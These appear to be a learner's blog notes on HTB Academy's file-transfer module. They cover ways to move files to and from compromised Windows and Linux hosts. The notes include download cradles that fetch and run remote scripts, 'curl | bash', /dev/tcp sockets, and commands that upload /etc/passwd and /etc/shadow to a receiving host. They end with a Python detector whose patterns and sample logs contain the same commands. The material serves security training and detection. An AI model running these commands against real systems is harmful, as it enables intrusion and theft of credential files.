File Transfer Notes
Notes for the 'File Transfer' module from HTB Academy
🪟 Windows
📥 Downloading to Target
1. Base64 Encoding
- Encode on your machine, paste and decode on target.
2. PowerShell Methods (Net.WebClient)
- DownloadFile: (New-Object Net.WebClient).DownloadFile('URL','output')
- DownloadFileAsync: (New-Object Net.WebClient).DownloadFileAsync('URL','output')
- DownloadString: IEX (New-Object Net.WebClient).DownloadString('url')
- Invoke-WebRequest: Invoke-WebRequest [url] -OutFile [file]
  - Use -UseBasicParsing if needed.
- Bypass SSL errors:
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
3. SMB
- Sender:
sudo impacket-smbserver share -smb2support /tmp/smbshare -user test -password test
- Receiver:
net use n: \\IP\share /user:test test
copy n:\nc.exe
4. FTP
- Sender:
sudo pip3 install pyftpdlib
sudo python3 -m pyftpdlib --port 21
- Receiver:
(New-Object Net.WebClient).DownloadFile('ftp://IP/file.txt','C:\path\file.txt')
- Command file method: Create a script file with FTP commands, then run:
ftp -v -n -s:ftpcommand.txt
📤 Uploading from Target
1. Base64 Encoding
Encode, transfer, decode.
2. PowerShell Web Upload (Invoke-RestMethod)
- Receiver:
python3 -m uploadserver
- Sender:
IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/juliourena/plaintext/master/Powershell/PSUpload.ps1')
Invoke-FileUpload -Uri http://IP:PORT/upload -File <file>
3. SMB via WebDav
- Receiver:
sudo pip3 install wsgidav cheroot
sudo wsgidav --host=0.0.0.0 --port=80 --root=/tmp --auth=anonymous
- Sender:
copy C:\path\file.zip \\IP\DavWWWRoot\
4. FTP Upload
(New-Object Net.WebClient).UploadFile('ftp://IP/file','C:\path\file')
🐧 Linux
📥 Downloading to Victim
1. Base64
cat id_rsa | base64 -w 0
2. Web Downloads
- Curl: curl [url] -o [file]
- Wget: wget [url] -O [file]
- Fileless: curl [url] | bash
3. Bash Socket
exec 3<>/dev/tcp/IP/80
echo -e "GET /LinEnum.sh HTTP/1.1\n\n" >&3
cat <&3
4. SSH
- Sender:
sudo systemctl enable ssh
sudo systemctl start ssh
- Receiver:
scp user@IP:/path/to/file .
📤 Uploading from Victim
1. Web Upload
- Receiver:
python3 -m uploadserver 443 --server-certificate server.pem
- Victim:
curl -X POST https://IP/upload -F 'files=@/etc/passwd' -F 'files=@/etc/shadow' --insecure
2. Alternate Uploads
- Web servers:
python3 -m http.server
php -S 0.0.0.0:8000
ruby -run -ehttpd . -p8000
- Download:
wget http://IP:8000/file.txt
3. SCP
scp /etc/passwd user@IP:/path/
💻 Transfer via Code
Python
python2 -c 'import urllib;urllib.urlretrieve ("URL","file")'
python3 -c 'import urllib.request;urllib.request.urlretrieve("URL","file")'
PHP
php -r '$f=file_get_contents("URL");file_put_contents("file",$f);'
Ruby
ruby -e 'require "net/http"; File.write("file", Net::HTTP.get(URI.parse("URL")))'
Perl
perl -e 'use LWP::Simple; getstore("URL", "file");'
JavaScript
Create wget.js with WinHttp code, then:
cscript.exe /nologo wget.js URL filename
VBScript
Create wget.vbs, then:
cscript.exe /nologo wget.vbs URL filename
🐍 Upload with Python
- Receiver:
python3 -m uploadserver
- Sender:
python3 -c 'import requests;requests.post("http://IP:8000/upload",files={"files":open("/etc/passwd","rb")})'
⚙️ Miscellaneous Methods
🛜 Netcat/Ncat:
- Can be used to transfer files via TCP sockets, but avoid if encrypted channels are required.
🖥️ Rdesktop:
- Useful for downloading/uploading files when RDP is enabled. Use drag-and-drop or clipboard transfer if possible.
🔐 Encrypted Transfer
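# Encrypt (-pbkdf2 -iter replace the deprecated single-pass key derivation that plain "enc" uses)
openssl enc -aes256 -pbkdf2 -iter 100000 -in file.txt -out file.enc
# Decrypt (must use the same -pbkdf2 and -iter values as the encrypt step)
openssl enc -aes256 -d -pbkdf2 -iter 100000 -in file.enc -out file.txt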
🧱 Living Off The Land (LOTL)
🧰 LOLBAS (Living Off The Land Binaries and Scripts)
- Binaries already present in Windows that can be abused by attackers.
- Examples: certutil, mshta, regsvr32, powershell, wmic
🔗 https://lolbas-project.github.io/
🔨 GTFOBins
- Linux equivalent of LOLBAS.
- Collection of binaries that can be exploited for privilege escalation, file access, execution, etc.
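Seen from the defending side, most of the one-liners in these notes leave a recognizable process command line. The following is an added example (not part of the original notes or the HTB module) that matches process-creation records against patterns for the transfer techniques listed above; the rule names, the tab-separated record format and the sample records are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Rule names are illustrative (assumption); each pattern targets a one-liner from the notes.
RULES = {
    "ps_webclient_transfer": re.compile(
        r"net\.webclient\)?\.(download(file(async)?|string)|uploadfile)\(", re.I),
    "ps_download_cradle": re.compile(r"\b(iex|invoke-expression)\b.*downloadstring", re.I),
    "ps_cert_validation_off": re.compile(
        r"servercertificatevalidationcallback\s*=\s*\{\s*\$true\s*\}", re.I),
    "pipe_to_shell": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b", re.I),
    "bash_dev_tcp": re.compile(r"/dev/tcp/[^/\s]+/\d+"),
    "interpreter_fetch": re.compile(
        r"\b(python[23]?|php|ruby|perl)\s+-[cer]\s.*"
        r"(urlretrieve|file_get_contents|net::http|getstore|requests\.post)", re.I),
    "cscript_wget": re.compile(r"\bcscript(\.exe)?\s.*\bwget\.(js|vbs)\b", re.I),
    "webdav_unc_copy": re.compile(r"\\\\[^\\\s]+\\davwwwroot\\", re.I),
    "ftp_command_file": re.compile(r"\bftp(\.exe)?\s.*-s:\S+", re.I),
}

def match_rules(cmdline):
    """Return the sorted names of all rules whose pattern occurs in cmdline."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmdline))

def scan(log_lines):
    """Map host -> set of rule names seen; records are host<TAB>image<TAB>cmdline."""
    hits = defaultdict(set)
    for line in log_lines:
        parts = line.rstrip("\n").split("\t", 2)
        if len(parts) != 3:          # skip malformed records instead of failing
            continue
        host, _image, cmdline = parts
        hits[host].update(match_rules(cmdline))
    return {host: names for host, names in hits.items() if names}

# Constructed sample records (not real telemetry); 192.0.2.10 is a documentation address.
SAMPLE_LOG = [
    "ws01\tpowershell.exe\tpowershell -c \"IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/a.ps1')\"",
    "ws01\tcmd.exe\tcopy C:\\temp\\file.zip \\\\192.0.2.10\\DavWWWRoot\\file.zip",
    "ws01\tftp.exe\tftp -v -n -s:ftpcommand.txt",
    "web01\tbash\tbash -c 'curl http://192.0.2.10/setup.sh | bash'",
    "web01\tbash\tbash -c 'exec 3<>/dev/tcp/192.0.2.10/80'",
    "web01\tcurl\tcurl https://example.com/health -o /dev/null",  # benign control
    "db01\tpython3\tpython3 -c 'import urllib.request;urllib.request.urlretrieve(\"http://192.0.2.10/f\",\"f\")'",
]

if __name__ == "__main__":
    for host, names in sorted(scan(SAMPLE_LOG).items()):
        print(host, sorted(names))
```

Plain substring patterns like these miss encoded or obfuscated command lines, so they work best as a first-pass filter alongside network telemetry.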
This post is licensed under CC BY 4.0 by the author.